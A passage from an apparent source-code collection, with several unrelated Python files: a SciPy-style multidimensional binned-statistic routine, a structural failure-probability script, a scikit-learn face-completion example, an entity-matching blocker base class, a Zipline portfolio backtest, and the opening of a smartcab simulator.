    .. versionadded:: 0.11.0
    """
    known_stats = ['mean', 'median', 'count', 'sum', 'std']
    if not callable(statistic) and statistic not in known_stats:
        raise ValueError('invalid statistic %r' % (statistic,))

    # This code is based on np.histogramdd
    try:
        # Sample is an ND-array.
        N, D = sample.shape
    except (AttributeError, ValueError):
        # Sample is a sequence of 1D arrays.
        sample = np.atleast_2d(sample).T
        N, D = sample.shape

    nbin = np.empty(D, int)
    edges = D * [None]
    dedges = D * [None]

    try:
        M = len(bins)
        if M != D:
            raise AttributeError('The dimension of bins must be equal '
                                 'to the dimension of the sample x.')
    except TypeError:
        bins = D * [bins]

    # Select range for each dimension
    # Used only if number of bins is given.
    if range is None:
        smin = np.atleast_1d(np.array(sample.min(0), float))
        smax = np.atleast_1d(np.array(sample.max(0), float))
    else:
        smin = np.zeros(D)
        smax = np.zeros(D)
        for i in np.arange(D):
            smin[i], smax[i] = range[i]

    # Make sure the bins have a finite width.
    for i in np.arange(len(smin)):
        if smin[i] == smax[i]:
            smin[i] = smin[i] - .5
            smax[i] = smax[i] + .5

    # Create edge arrays
    for i in np.arange(D):
        if np.isscalar(bins[i]):
            nbin[i] = bins[i] + 2  # +2 for outlier bins
            edges[i] = np.linspace(smin[i], smax[i], nbin[i] - 1)
        else:
            edges[i] = np.asarray(bins[i], float)
            nbin[i] = len(edges[i]) + 1  # +1 for outlier bins
        dedges[i] = np.diff(edges[i])

    nbin = np.asarray(nbin)

    # Compute the bin number each sample falls into.
    Ncount = {}
    for i in np.arange(D):
        Ncount[i] = np.digitize(sample[:, i], edges[i])

    # Using digitize, values that fall on an edge are put in the right bin.
    # For the rightmost bin, we want values equal to the right
    # edge to be counted in the last bin, and not as an outlier.
    for i in np.arange(D):
        # Rounding precision chosen relative to the smallest bin width.
        decimal = int(-np.log10(dedges[i].min())) + 6
        # Find which points are on the rightmost edge.
        on_edge = np.where(np.around(sample[:, i], decimal)
                           == np.around(edges[i][-1], decimal))[0]
        # Shift these points one bin to the left.
        Ncount[i][on_edge] -= 1

    # Compute the sample indices in the flattened statistic matrix.
    ni = nbin.argsort()
    xy = np.zeros(N, int)
    for i in np.arange(0, D - 1):
        xy += Ncount[ni[i]] * nbin[ni[i + 1:]].prod()
    xy += Ncount[ni[-1]]

    result = np.empty(nbin.prod(), float)

    if statistic == 'mean':
        result.fill(np.nan)
        flatcount = np.bincount(xy, None)
        flatsum = np.bincount(xy, values)
        a = flatcount.nonzero()
        result[a] = flatsum[a] / flatcount[a]
    elif statistic == 'std':
        result.fill(0)
        flatcount = np.bincount(xy, None)
        flatsum = np.bincount(xy, values)
        flatsum2 = np.bincount(xy, values ** 2)
        a = flatcount.nonzero()
        result[a] = np.sqrt(flatsum2[a] / flatcount[a]
                            - (flatsum[a] / flatcount[a]) ** 2)
    elif statistic == 'count':
        result.fill(0)
        flatcount = np.bincount(xy, None)
        a = np.arange(len(flatcount))
        result[a] = flatcount
    elif statistic == 'sum':
        result.fill(0)
        flatsum = np.bincount(xy, values)
        a = np.arange(len(flatsum))
        result[a] = flatsum
    elif statistic == 'median':
        result.fill(np.nan)
        for i in np.unique(xy):
            result[i] = np.median(values[xy == i])
    elif callable(statistic):
        with warnings.catch_warnings():
            # Numpy generates a warnings for mean/std/... with empty list
            warnings.filterwarnings('ignore', category=RuntimeWarning)
            old = np.seterr(invalid='ignore')
            try:
                null = statistic([])
            except:
                null = np.nan
            np.seterr(**old)
        result.fill(null)
        for i in np.unique(xy):
            result[i] = statistic(values[xy == i])

    # Shape into a proper matrix
    result = result.reshape(np.sort(nbin))
    for i in np.arange(nbin.size):
        j = ni.argsort()[i]
        result = result.swapaxes(i, j)
        ni[i], ni[j] = ni[j], ni[i]

    # Remove outliers (indices 0 and -1 for each dimension).
    # BUGFIX: multidimensional indexing must use a *tuple* of slices --
    # indexing an ndarray with a list of slices was deprecated in NumPy
    # 1.15 and is an error in current NumPy.
    core = D * (slice(1, -1),)
    result = result[core]

    if (result.shape != nbin - 2).any():
        raise RuntimeError('Internal Shape Error')

    BinnedStatisticddResult = namedtuple('BinnedStatisticddResult',
                                         ('statistic', 'bin_edges',
                                          'binnumber'))
    return BinnedStatisticddResult(result, edges, xy)
| bsd-3-clause |
haphaeu/yoshimi | spyder_workspace/Statistics/load_vs_resistance.py | 1 | 5065 | # -*- coding: utf-8 -*-
"""
Created on Thu Nov 26 13:07:02 2015
@author: rarossi
A structure will fail if subjected to a load greater then its own resistance:
failure := load > resistance
We can safely assume that the load and the resistance are independent.
By means of probability density functions (pdf) and cumulative density
functions (cdf) of the load and of the resistance, is it correct to say that
the probability of failure, can be calculated by the integral of
load_pdf * resistance_cdf ?
Confirmed at
http://stats.stackexchange.com/questions/183743/probability-of-failure
"""
import numpy as np
import scipy as sp
from scipy import stats as ss
from matplotlib import pyplot as plt
# %%
# This below double checks the p_failure calcs.
# Calculate the probability of failure as the integral of the convolution
# of load_pdf and resistance_pdf.
# see http://stats.stackexchange.com/questions/183743/probability-of-failure
# ==> I'm sure this could be done using the numpy convolve function but I
# still don't know how to do it.
def pfail_dblchk(fl, fr, x):
    """fl, fr: pdf functions of load and resistance
    x: domain (uniform grid)
    return the probability of failure

    Computes the double integral of fl(x)*fr(tau+x) over tau in
    [x[0]-(x[-1]-x[0]), 0], which equals P(load > resistance).
    """
    dx = x[1] - x[0]

    def _inner(tau):
        # Trapezoid-rule integral of fl(x)*fr(tau+x) over the grid.
        # Identical in value to scipy.integrate.cumtrapz(y, dx=dx)[-1],
        # which was removed in SciPy 1.14 (renamed cumulative_trapezoid).
        y = fl(x) * fr(tau + x)
        return dx * (y.sum() - 0.5 * (y[0] + y[-1]))

    return sp.integrate.quad(_inner, x[0] - (x[-1] - x[0]), 0)[0]
# %% #########################################################
def pfail(fl, Fr, x, dx):
    """Probability of failure given load and resistance.

    pfail = integral of load_pdf * resistance_cdf

    fl: pdf function of the load
    Fr: cdf function of the resistance
    x, dx: domain (uniform grid and its spacing)
    """
    # Trapezoid rule on the uniform grid. Identical in value to
    # scipy.integrate.cumtrapz(y, dx=dx)[-1], which was removed in
    # SciPy 1.14 (renamed cumulative_trapezoid).
    y = fl(x) * Fr(x)
    return dx * (y.sum() - 0.5 * (y[0] + y[-1]))
# %%
def optimize_loc(res_loc, res_scale, load_distro, conf_target, eps):
    """Auxiliary function to be used with the scipy.optimize.bisect function
    to find the location parameter of the resistance distribution that
    matches a required confidence level.

    res_loc, res_scale: location and scale parameters of the distribution
    load_distro: load distribution (frozen scipy.stats distribution)
    conf_target: confidence level target
    eps: limit integration domain where load and resistance pdfs are > eps

    Returns the achieved confidence minus the target, so the root of this
    function is the sought location parameter.
    """
    res_distro = ss.gumbel_l(loc=res_loc, scale=res_scale)
    # Integration domain covering both distributions down to density eps.
    lo = min(load_distro.ppf(eps), res_distro.ppf(eps))
    hi = max(load_distro.ppf(1 - eps), res_distro.ppf(1 - eps))
    x, dx = np.linspace(lo, hi, 2000, retstep=True)
    confidence = 1.0 - pfail(load_distro.pdf, res_distro.cdf, x, dx)
    return confidence - conf_target
# %%
if __name__ == '__main__':
    # input data
    conf_target = 0.9 # confidence level of non-failure
    load_loc = 100 # location parameter for the load distribution
    load_scale = 5 # scale parameter for the load distribution
    res_scale = 3.5 # scale parameter for the resistance distribution
    eps = 1e-8 # domain = pdf > eps, for load and resistance
    # frozen load distribution
    load_distro = ss.gumbel_r(loc=load_loc, scale=load_scale)
    # finds the location parameter for the resistance distribution that
    # gives the required conf_target (root of optimize_loc via bisection)
    res_loc = sp.optimize.bisect(optimize_loc, load_loc,
                                 load_distro.ppf(1-eps),
                                 args=(res_scale, load_distro,
                                       conf_target, eps))
    # frozen resistance distribution
    res_distro = ss.gumbel_l(loc=res_loc, scale=res_scale)
    # recalculates the domain and the confidence level
    x, dx = np.linspace(min(load_distro.ppf(eps), res_distro.ppf(eps)),
                        max(load_distro.ppf(1-eps), res_distro.ppf(1-eps)),
                        200, retstep=True)
    confidence = 1.0 - pfail(load_distro.pdf, res_distro.cdf, x, dx)
    # %% plotting
    plt.plot(x, load_distro.pdf(x), label='load pdf')
    plt.plot(x, res_distro.pdf(x), label='resistance pdf')
    plt.grid()
    plt.legend(loc='best')
    plt.show()
    print('Confidence %.3f%%' % (100*confidence))
    # cross-check via the convolution formulation
    pfailure = pfail_dblchk(load_distro.pdf, res_distro.pdf, x)
    print('Dbl check %.3f%%' % (100*(1-pfailure)))
"""
Tentando resolver integral load_pdf * res_cdf analiticamente...
\\
\\\text{Assuming Gumbel distribution.} \\
f: PDF \\
F: CDF \\
\\\text{The load is likely to be right skewed:}
\\
f_l(x) = \frac{1}{\beta} e^{-(z+e^{-z})} \\
F_l(x) = e^{-e^{-z}} \\
z = \frac{x-\mu}{\beta}
\\\\\text{The resistance is likely to be left skewed:} \\
f_r(x)= \frac{1}{\beta} e^{(z-e^z)} \\
F_r(x) = 1 - e^{-e^z} \\
\\\\\text{The probability of failure is:} \\
p_{fail} = \int_{-\infty}^\infty f_{load}(x) F_{res} (x) dx \\
= \int_{-\infty}^\infty
\frac{1}{\beta_l} e^{-(z+e^{-z_l})}
\big( 1 - e^{-e^z_r} \big) dx \\
= \int_{-\infty}^\infty
\frac{1}{\beta_l} e^{-(\frac{x-\mu_l}{\beta_l}
+e^{-\frac{x-\mu_l}{\beta_l}})}
\big( 1 - e^{-e^\frac{x-\mu_r}{\beta_r}} \big) dx
"""
| lgpl-3.0 |
fabianp/scikit-learn | examples/plot_multioutput_face_completion.py | 330 | 3019 | """
==============================================
Face completion with a multi-output estimators
==============================================
This example shows the use of multi-output estimator to complete images.
The goal is to predict the lower half of a face given its upper half.
The first column of images shows true faces. The next columns illustrate
how extremely randomized trees, k nearest neighbors, linear
regression and ridge regression complete the lower half of those faces.
"""
print(__doc__)
import numpy as np
import matplotlib.pyplot as plt
from sklearn.datasets import fetch_olivetti_faces
from sklearn.utils.validation import check_random_state
from sklearn.ensemble import ExtraTreesRegressor
from sklearn.neighbors import KNeighborsRegressor
from sklearn.linear_model import LinearRegression
from sklearn.linear_model import RidgeCV
# Load the faces datasets
data = fetch_olivetti_faces()
targets = data.target

data = data.images.reshape((len(data.images), -1))
train = data[targets < 30]
test = data[targets >= 30]  # Test on independent people

# Test on a subset of people
n_faces = 5
rng = check_random_state(4)
face_ids = rng.randint(test.shape[0], size=(n_faces, ))
test = test[face_ids, :]

n_pixels = data.shape[1]
# BUGFIX: np.ceil / np.floor return floats, but slice bounds must be
# integers (float indices raise a TypeError on NumPy >= 1.12).
upper_cols = int(np.ceil(0.5 * n_pixels))
lower_start = int(np.floor(0.5 * n_pixels))
X_train = train[:, :upper_cols]   # Upper half of the faces
y_train = train[:, lower_start:]  # Lower half of the faces
X_test = test[:, :upper_cols]
y_test = test[:, lower_start:]

# Fit estimators
ESTIMATORS = {
    "Extra trees": ExtraTreesRegressor(n_estimators=10, max_features=32,
                                       random_state=0),
    "K-nn": KNeighborsRegressor(),
    "Linear regression": LinearRegression(),
    "Ridge": RidgeCV(),
}

y_test_predict = dict()
for name, estimator in ESTIMATORS.items():
    estimator.fit(X_train, y_train)
    y_test_predict[name] = estimator.predict(X_test)

# Plot the completed faces: first column is the true face, remaining
# columns are each estimator's reconstruction of the lower half.
image_shape = (64, 64)

n_cols = 1 + len(ESTIMATORS)
plt.figure(figsize=(2. * n_cols, 2.26 * n_faces))
plt.suptitle("Face completion with multi-output estimators", size=16)

for i in range(n_faces):
    true_face = np.hstack((X_test[i], y_test[i]))

    if i:
        sub = plt.subplot(n_faces, n_cols, i * n_cols + 1)
    else:
        sub = plt.subplot(n_faces, n_cols, i * n_cols + 1,
                          title="true faces")

    sub.axis("off")
    sub.imshow(true_face.reshape(image_shape),
               cmap=plt.cm.gray,
               interpolation="nearest")

    for j, est in enumerate(sorted(ESTIMATORS)):
        completed_face = np.hstack((X_test[i], y_test_predict[est][i]))

        if i:
            sub = plt.subplot(n_faces, n_cols, i * n_cols + 2 + j)
        else:
            sub = plt.subplot(n_faces, n_cols, i * n_cols + 2 + j,
                              title=est)

        sub.axis("off")
        sub.imshow(completed_face.reshape(image_shape),
                   cmap=plt.cm.gray,
                   interpolation="nearest")

plt.show()
| bsd-3-clause |
anhaidgroup/py_entitymatching | py_entitymatching/blocker/blocker.py | 1 | 4527 | import logging
import math
import pandas as pd
import six
import multiprocessing
from py_entitymatching.utils.validation_helper import validate_object_type
logger = logging.getLogger(__name__)
class Blocker(object):
    """Blocker base class.

    Provides the validation and bookkeeping helpers shared by the concrete
    blockers (attribute-equivalence, overlap, rule-based, ...): type checks
    for the public ``block_tables``/``block_candset`` parameters, and helpers
    that decide which columns to project/retain and how to split work across
    processes.
    """

    def validate_types_params_tables(self, ltable, rtable,
                                     l_output_attrs, r_output_attrs, l_output_prefix,
                                     r_output_prefix, verbose, n_jobs):
        """Type-check the standard ``block_tables(...)`` parameters.

        Raises (via validate_object_type) if any parameter has the wrong type.
        """
        validate_object_type(ltable, pd.DataFrame, error_prefix='Input left table')
        validate_object_type(rtable, pd.DataFrame, error_prefix='Input right table')
        if l_output_attrs:
            validate_object_type(l_output_attrs, list, 'Output attributes of left table')
            for x in l_output_attrs:
                validate_object_type(x, six.string_types, 'An output attribute name of left table')
        if r_output_attrs:
            validate_object_type(r_output_attrs, list, 'Output attributes of right table')
            for x in r_output_attrs:
                validate_object_type(x, six.string_types, 'An output attribute name of right table')
        validate_object_type(l_output_prefix, six.string_types, 'Output prefix of left table')
        validate_object_type(r_output_prefix, six.string_types, 'Output prefix of right table')
        validate_object_type(verbose, bool, 'Parameter verbose')
        validate_object_type(n_jobs, int, 'Parameter n_jobs')

    def validate_show_progress(self, show_progress):
        """Type-check the ``show_progress`` flag."""
        validate_object_type(show_progress, bool, 'Parameter show_progress')

    def validate_allow_missing(self, allow_missing):
        """Type-check the ``allow_missing`` flag."""
        validate_object_type(allow_missing, bool, 'Parameter allow_missing')

    def validate_types_params_candset(self, candset, verbose, show_progress, n_jobs):
        """Type-check the standard ``block_candset(...)`` parameters."""
        validate_object_type(candset, pd.DataFrame, 'Input candset')
        validate_object_type(verbose, bool, 'Parameter verbose')
        validate_object_type(show_progress, bool, 'Parameter show_progress')
        validate_object_type(n_jobs, int, 'Parameter n_jobs')

    def validate_output_attrs(self, ltable, rtable, l_output_attrs, r_output_attrs):
        """Assert that every requested output attribute exists in its table.

        A single attribute name (non-list) is accepted and wrapped in a list.
        """
        if l_output_attrs:
            if not isinstance(l_output_attrs, list):
                l_output_attrs = [l_output_attrs]
            # issubset() already returns a bool; comparing '== True' was redundant.
            assert set(l_output_attrs).issubset(ltable.columns), \
                'Left output attributes are not in the left table'
        if r_output_attrs:
            if not isinstance(r_output_attrs, list):
                r_output_attrs = [r_output_attrs]
            assert set(r_output_attrs).issubset(rtable.columns), \
                'Right output attributes are not in the right table'

    def get_attrs_to_retain(self, l_key, r_key, l_output_attrs, r_output_attrs,
                            l_output_prefix, r_output_prefix):
        """Return the ordered, prefixed list of columns to keep in the output.

        The two (prefixed) key columns always come first; requested output
        attributes follow, with duplicates skipped.
        """
        ret_cols = [l_output_prefix + l_key, r_output_prefix + r_key]
        if l_output_attrs:
            ret_cols.extend(l_output_prefix + c for c in l_output_attrs
                            if l_output_prefix + c not in ret_cols)
        if r_output_attrs:
            ret_cols.extend(r_output_prefix + c for c in r_output_attrs
                            if r_output_prefix + c not in ret_cols)
        return ret_cols

    def get_attrs_to_project(self, key, block_attr, output_attrs):
        """Return the attributes to project from a table.

        This is the requested output attributes plus the key and the blocking
        attribute (appended only if not already present).
        """
        proj_attrs = []
        if output_attrs is not None:
            proj_attrs.extend(output_attrs)
        if key not in proj_attrs:
            proj_attrs.append(key)
        if block_attr not in proj_attrs:
            proj_attrs.append(block_attr)
        return proj_attrs

    def get_split_params(self, n_procs, min_m, min_n):
        """Factor n_procs into an (m, n) grid with m * n == n_procs.

        m is the largest factor <= sqrt(n_procs). Each dimension is capped by
        (min_m, min_n) so small tables are not over-partitioned.
        """
        m = int(math.sqrt(n_procs))
        while n_procs % m != 0:
            m = m - 1
        n = int(n_procs / m)
        # to safeguard against small tables, do not split less than min values
        return min(m, min_m), min(n, min_n)

    def get_num_procs(self, n_jobs, min_procs):
        """Translate an sklearn-style n_jobs value into a process count.

        Negative n_jobs counts back from the CPU count (-1 => all CPUs).
        The result is capped at min_procs, an upper bound derived from the
        table sizes, to safeguard against small tables.
        """
        # determine number of processes to launch parallely
        n_cpus = multiprocessing.cpu_count()
        n_procs = n_jobs
        if n_jobs < 0:
            n_procs = n_cpus + 1 + n_jobs
        # cannot launch less than min_procs to safeguard against small tables
        return min(n_procs, min_procs)
| bsd-3-clause |
returnandrisk/meucci-python | dynamic_allocation_performance_analysis.py | 1 | 7540 | """
Python code for blog post "mini-Meucci : Applying The Checklist - Steps 10+"
http://www.returnandrisk.com/2016/07/mini-meucci-applying-checklist-steps-10.html
Copyright (c) 2016 Peter Chan (peter-at-return-and-risk-dot-com)
"""
###############################################################################
# Dynamic Allocation
###############################################################################
#%matplotlib inline
import rnr_meucci_functions as rnr
import numpy as np
from zipline.api import (set_slippage, slippage, set_commission, commission,
order_target_percent, record, schedule_function,
date_rules, time_rules, get_datetime, symbol)
# Set tickers for data loading i.e. DJIA constituents and DIA ETF for benchmark
tickers = ['MMM','AXP','AAPL','BA','CAT','CVX','CSCO','KO','DD','XOM','GE','GS',
           'HD','INTC','IBM','JNJ','JPM','MCD','MRK','MSFT','NKE','PFE','PG',
           'TRV','UNH','UTX','VZ','V','WMT','DIS', 'DIA']
# Set investable asset tickers: the same 30 DJIA constituents, excluding the
# DIA benchmark ETF (which is loaded only for performance comparison)
asset_tickers = ['MMM','AXP','AAPL','BA','CAT','CVX','CSCO','KO','DD','XOM','GE','GS',
                 'HD','INTC','IBM','JNJ','JPM','MCD','MRK','MSFT','NKE','PFE','PG',
                 'TRV','UNH','UTX','VZ','V','WMT','DIS']
def initialize(context):
    """Zipline initialization hook.

    Configures trading costs, seeds the algorithm state stored on *context*,
    and schedules the monthly rebalance plus the daily variable recording.
    """
    # Trading costs: no slippage, fixed per-share commission.
    set_slippage(slippage.FixedSlippage(spread=0.0))
    set_commission(commission.PerShare(cost=0.01, min_trade_cost=1.0))

    context.day = -1  # zero-based trading-day counter, advanced in handle_data
    context.set_benchmark(symbol('DIA'))

    print('Setup investable assets...')
    context.assets = [symbol(ticker) for ticker in asset_tickers]
    context.n_asset = len(context.assets)

    # Allocation state, filled in by rebalance() once enough history exists.
    context.n_portfolio = 40  # num mean-variance efficient portfolios to compute
    context.today = None
    context.tau = None
    context.min_data_window = 756  # min of 3 yrs data for calculations
    context.first_rebal_date = None
    context.first_rebal_idx = None
    context.weights = None

    # Weights are computed 1 day before month end; the resulting orders fill
    # on the close of the last trading day of the month.
    schedule_function(rebalance,
                      date_rule=date_rules.month_end(days_offset=1),
                      time_rule=time_rules.market_close())
    schedule_function(record_vars,
                      date_rule=date_rules.every_day(),
                      time_rule=time_rules.market_close())
def handle_data(context, data):
    """Daily bar hook: advance the zero-based trading-day counter."""
    context.day = context.day + 1
def rebalance(context, data):
    """Monthly allocation step (scheduled 1 trading day before month end).

    Builds next-month return scenarios from an expanding price window,
    weights them with exponentially-smoothed flexible probabilities,
    shrinks the moment estimates, and trades into the minimum-variance
    portfolio of the resulting mean-variance efficient frontier.
    """
    # Wait for 756 trading days (3 yrs) of historical prices before trading
    if context.day < context.min_data_window - 1:
        return
    # Get expanding window of past prices and compute returns
    context.today = get_datetime().date()
    prices = data.history(context.assets, "price", context.day, "1d")
    if context.first_rebal_date is None:
        # First time we have enough data: remember when trading actually began.
        context.first_rebal_date = context.today
        context.first_rebal_idx = context.day
        print('Starting dynamic allocation simulation...')
    # Get investment horizon in days ie number of trading days next month
    context.tau = rnr.get_num_days_nxt_month(context.today.month, context.today.year)
    # Calculate HFP distribution: tau-day overlapping returns as scenarios
    asset_rets = np.array(prices.pct_change(context.tau).iloc[context.tau:, :])
    num_scenarios = len(asset_rets)
    # Set Flexible Probabilities Using Exponential Smoothing
    # (most recent scenario gets the highest probability)
    half_life_prjn = 252 * 2  # in days
    lambda_prjn = np.log(2) / half_life_prjn
    probs_prjn = np.exp(-lambda_prjn * (np.arange(0, num_scenarios)[::-1]))
    probs_prjn = probs_prjn / sum(probs_prjn)
    mu_pc, sigma2_pc = rnr.fp_mean_cov(asset_rets.T, probs_prjn)
    # Perform shrinkage to mitigate estimation risk
    mu_shrk, sigma2_shrk = rnr.simple_shrinkage(mu_pc, sigma2_pc)
    weights, _, _ = rnr.efficient_frontier_qp_rets(context.n_portfolio,
                                                   sigma2_shrk, mu_shrk)
    print('Optimal weights calculated 1 day before month end on %s (day=%s)' \
        % (context.today, context.day))
    #print(weights)
    # NOTE(review): row 0 is taken as the minimum-variance portfolio — assumes
    # the frontier is ordered from min-variance upward; confirm against
    # rnr.efficient_frontier_qp_rets.
    min_var_weights = weights[0,:]
    # Rebalance portfolio accordingly
    for stock, weight in zip(prices.columns, min_var_weights):
        order_target_percent(stock, np.asscalar(weight))
    context.weights = min_var_weights
def record_vars(context, data):
    """Record the current portfolio weights and investment horizon daily."""
    snapshot = {'weights': context.weights, 'tau': context.tau}
    record(**snapshot)
def analyze(perf, bm_value, start_idx):
    """Plot portfolio value against the benchmark from start_idx onward.

    perf      -- zipline performance DataFrame (needs a 'portfolio_value' column)
    bm_value  -- benchmark value series aligned with perf's index
    start_idx -- positional index of the first bar to plot (trading start)

    Bug fix: the original body read the module-level ``results`` variable
    instead of the ``perf`` parameter, so the function only worked when
    called from __main__ with results in scope (and silently ignored any
    other DataFrame passed in).
    """
    pd.DataFrame({'portfolio': perf.portfolio_value, 'benchmark': bm_value})\
        .iloc[start_idx:, :].plot(title='Portfolio Performance vs Benchmark')
if __name__ == '__main__':
    from datetime import datetime
    import pytz
    from zipline.algorithm import TradingAlgorithm
    from zipline.utils.factory import load_bars_from_yahoo
    import pandas as pd
    import matplotlib.pyplot as plt

    # Create and run the algorithm.
    algo = TradingAlgorithm(initialize=initialize, handle_data=handle_data)
    start = datetime(2010, 5, 1, 0, 0, 0, 0, pytz.utc)
    end = datetime(2016, 5, 31, 0, 0, 0, 0, pytz.utc)
    print('Getting Yahoo data for 30 DJIA stocks and DIA ETF as benchmark...')
    data = load_bars_from_yahoo(stocks=tickers, start=start, end=end)
    # Check price data
    data.loc[:, :, 'price'].plot(figsize=(8,7), title='Input Price Data')
    plt.ylabel('price in $');
    plt.legend(loc='center left', bbox_to_anchor=(1.0, 0.5))
    plt.show()
    # Run algorithm
    results = algo.run(data)
    # Fix possible issue with timezone
    results.index = results.index.normalize()
    if results.index.tzinfo is None:
        results.index = results.index.tz_localize('UTC')
    # Adjust benchmark returns for delayed trading due to 3 year min data window:
    # zero the benchmark until the first rebalance so both curves start together.
    bm_rets = algo.perf_tracker.all_benchmark_returns
    bm_rets[0:algo.first_rebal_idx + 2] = 0
    bm_rets.name = 'DIA'
    bm_rets.index.freq = None
    bm_value = algo.capital_base * np.cumprod(1+bm_rets)
    # Plot portfolio and benchmark values
    analyze(results, bm_value, algo.first_rebal_idx + 1)
    # NOTE(review): .ix indexing is removed in modern pandas — this script
    # only runs on the old pandas versions zipline 0.x supported.
    print('End value portfolio = {:.0f}'.format(results.portfolio_value.ix[-1]))
    print('End value benchmark = {:.0f}'.format(bm_value[-1]))
    # Plot end weights
    pd.DataFrame(results.weights.ix[-1], index=asset_tickers, columns=['w'])\
        .sort_values('w', ascending=False).plot(kind='bar', \
        title='End Simulation Weights', legend=None);

    ###########################################################################
    # Sequel Step - Ex-post performance analysis
    ###########################################################################
    import pyfolio as pf
    returns, positions, transactions, gross_lev = pf.utils.\
        extract_rets_pos_txn_from_zipline(results)
    trade_start = results.index[algo.first_rebal_idx + 1]
    trade_end = datetime(2016, 5, 31, 0, 0, 0, 0, pytz.utc)
    print('Annualised volatility of the portfolio = {:.4}'.\
        format(pf.timeseries.annual_volatility(returns[trade_start:trade_end])))
    print('Annualised volatility of the benchmark = {:.4}'.\
        format(pf.timeseries.annual_volatility(bm_rets[trade_start:trade_end])))
    print('')
    pf.create_returns_tear_sheet(returns[trade_start:trade_end],
                                 benchmark_rets=bm_rets[trade_start:trade_end],
                                 return_fig=False)
| mit |
aattaran/Machine-Learning-with-Python | smartcab - Copy/smartcab/simulator.py | 11 | 25158 | ###########################################
# Suppress matplotlib user warnings
# Necessary for newer version of matplotlib
import warnings
warnings.filterwarnings("ignore", category = UserWarning, module = "matplotlib")
###########################################
import os
import time
import random
import importlib
import csv
class Simulator(object):
    """Simulates agents in a dynamic smartcab environment.

    Uses PyGame to display GUI, if available.
    """

    # Named RGB colors used for roads, agents and status text.
    colors = {
        'black'   : (  0,   0,   0),
        'white'   : (255, 255, 255),
        'red'     : (255,   0,   0),
        'green'   : (  0, 255,   0),
        'dgreen'  : (  0, 228,   0),
        'blue'    : (  0,   0, 255),
        'cyan'    : (  0, 200, 200),
        'magenta' : (200,   0, 200),
        'yellow'  : (255, 255,   0),
        'mustard' : (200, 200,   0),
        'orange'  : (255, 128,   0),
        'maroon'  : (200,   0,   0),
        'crimson' : (128,   0,   0),
        'gray'    : (155, 155, 155)
    }

    def __init__(self, env, size=None, update_delay=2.0, display=True, log_metrics=False, optimized=False):
        """Set up the simulation: timing, optional PyGame GUI, and metric logging.

        env          -- Environment instance to simulate
        size         -- (width, height) of the GUI window in pixels; derived
                        from the environment grid when None
        update_delay -- seconds between environment steps
        display      -- render the PyGame GUI when True (and pygame imports)
        log_metrics  -- write per-trial metrics to CSV files under logs/
        optimized    -- use the 'improved' log filenames (parameter-tuning runs)
        """
        self.env = env
        self.size = size if size is not None else ((self.env.grid_size[0] + 1) * self.env.block_size, (self.env.grid_size[1] + 2) * self.env.block_size)
        self.width, self.height = self.size
        self.road_width = 44

        self.bg_color = self.colors['gray']
        self.road_color = self.colors['black']
        self.line_color = self.colors['mustard']
        self.boundary = self.colors['black']
        self.stop_color = self.colors['crimson']

        self.quit = False
        self.start_time = None
        self.current_time = 0.0
        self.last_updated = 0.0
        self.update_delay = update_delay  # duration between each step (in seconds)

        # GUI setup: any failure (pygame missing, asset load error) silently
        # degrades to the text-only simulation.
        self.display = display
        if self.display:
            try:
                self.pygame = importlib.import_module('pygame')
                self.pygame.init()
                self.screen = self.pygame.display.set_mode(self.size)

                self._logo = self.pygame.transform.smoothscale(self.pygame.image.load(os.path.join("images", "logo.png")), (self.road_width, self.road_width))
                self._ew = self.pygame.transform.smoothscale(self.pygame.image.load(os.path.join("images", "east-west.png")), (self.road_width, self.road_width))
                self._ns = self.pygame.transform.smoothscale(self.pygame.image.load(os.path.join("images", "north-south.png")), (self.road_width, self.road_width))

                self.frame_delay = max(1, int(self.update_delay * 1000))  # delay between GUI frames in ms (min: 1)
                self.agent_sprite_size = (32, 32)
                self.primary_agent_sprite_size = (42, 42)
                self.agent_circle_radius = 20  # radius of circle, when using simple representation
                # White is the primary (learning) agent and gets the larger sprite.
                for agent in self.env.agent_states:
                    if agent.color == 'white':
                        agent._sprite = self.pygame.transform.smoothscale(self.pygame.image.load(os.path.join("images", "car-{}.png".format(agent.color))), self.primary_agent_sprite_size)
                    else:
                        agent._sprite = self.pygame.transform.smoothscale(self.pygame.image.load(os.path.join("images", "car-{}.png".format(agent.color))), self.agent_sprite_size)
                    agent._sprite_size = (agent._sprite.get_width(), agent._sprite.get_height())

                self.font = self.pygame.font.Font(None, 20)
                self.paused = False
            except ImportError as e:
                self.display = False
                print "Simulator.__init__(): Unable to import pygame; display disabled.\n{}: {}".format(e.__class__.__name__, e)
            except Exception as e:
                self.display = False
                print "Simulator.__init__(): Error initializing GUI objects; display disabled.\n{}: {}".format(e.__class__.__name__, e)

        # Setup metrics to report
        self.log_metrics = log_metrics
        self.optimized = optimized

        if self.log_metrics:
            a = self.env.primary_agent

            # Set log files
            if a.learning:
                if self.optimized: # Whether the user is optimizing the parameters and decay functions
                    self.log_filename = os.path.join("logs", "sim_improved-learning.csv")
                    self.table_filename = os.path.join("logs","sim_improved-learning.txt")
                else:
                    self.log_filename = os.path.join("logs", "sim_default-learning.csv")
                    self.table_filename = os.path.join("logs","sim_default-learning.txt")

                self.table_file = open(self.table_filename, 'wb')
            else:
                self.log_filename = os.path.join("logs", "sim_no-learning.csv")

            self.log_fields = ['trial', 'testing', 'parameters', 'initial_deadline', 'final_deadline', 'net_reward', 'actions', 'success']
            self.log_file = open(self.log_filename, 'wb')
            self.log_writer = csv.DictWriter(self.log_file, fieldnames=self.log_fields)
            self.log_writer.writeheader()

    def run(self, tolerance=0.05, n_test=0):
        """ Run a simulation of the environment.

        'tolerance' is the minimum epsilon necessary to begin testing (if enabled)
        'n_test' is the number of testing trials simulated

        Note that the minimum number of training trials is always 20. """

        self.quit = False

        # Get the primary agent
        a = self.env.primary_agent

        total_trials = 1
        testing = False
        trial = 1

        # Outer loop: one iteration per trial (training first, then testing).
        while True:

            # Flip testing switch
            if not testing:
                if total_trials > 20: # Must complete minimum 20 training trials
                    if a.learning:
                        if a.epsilon < tolerance: # assumes epsilon decays to 0
                            testing = True
                            trial = 1
                    else:
                        testing = True
                        trial = 1

            # Break if we've reached the limit of testing trials
            else:
                if trial > n_test:
                    break

            # Pretty print to terminal
            print
            print "/-------------------------"
            if testing:
                print "| Testing trial {}".format(trial)
            else:
                print "| Training trial {}".format(trial)
            print "\-------------------------"
            print

            self.env.reset(testing)
            self.current_time = 0.0
            self.last_updated = 0.0
            self.start_time = time.time()

            # Inner loop: steps within a single trial, paced by update_delay.
            while True:
                try:
                    # Update current time
                    self.current_time = time.time() - self.start_time

                    # Handle GUI events
                    if self.display:
                        for event in self.pygame.event.get():
                            if event.type == self.pygame.QUIT:
                                self.quit = True
